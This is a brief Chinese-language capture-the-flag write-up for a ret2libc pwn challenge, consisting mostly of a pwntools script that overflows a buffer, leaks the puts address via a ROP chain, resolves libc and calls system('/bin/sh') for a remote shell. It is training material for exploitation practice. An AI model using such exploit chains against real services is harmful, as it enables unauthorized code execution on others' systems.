一道retlibc
不难,按照以往的就可以
from pwn import *
from LibcSearcher import *
i = remote('node4.anna.nssctf.cn',28197)
ret = 0x4004c9
pop_rdi = 0x400733
# vuln = 0x40067d
elf =ELF('./000')
main = elf.sym['main']
put_p = elf.plt['puts']
put_g = elf.got['puts']
payload = b'a'*(0x20+8)+p64(pop_rdi)+p64(put_g)+p64(put_p)+p64(main)
i.recvuntil('Pull up your sword and tell me u story!')
i.sendline(payload)
i.recv()
puts_add = u64(i.recv(6).ljust(8,b'\x00'))
libc = LibcSearcher('puts',puts_add)
offset = puts_add - libc.dump('puts')
sys = offset +libc.dump('system')
bin_sh = offset + libc.dump("str_bin_sh")
payload2 = b'a'*(0x20+8)+p64(pop_rdi)+p64(bin_sh)+p64(sys)
i.recvuntil('Pull up your sword and tell me u story!')
i.sendline(payload2)
i.interactive()
提醒一下,elf.ELF是()不是[]
puts_add = u64(i.recv(6).ljust(8,b'\x00'))用来接收plt表中的puts的真实地址的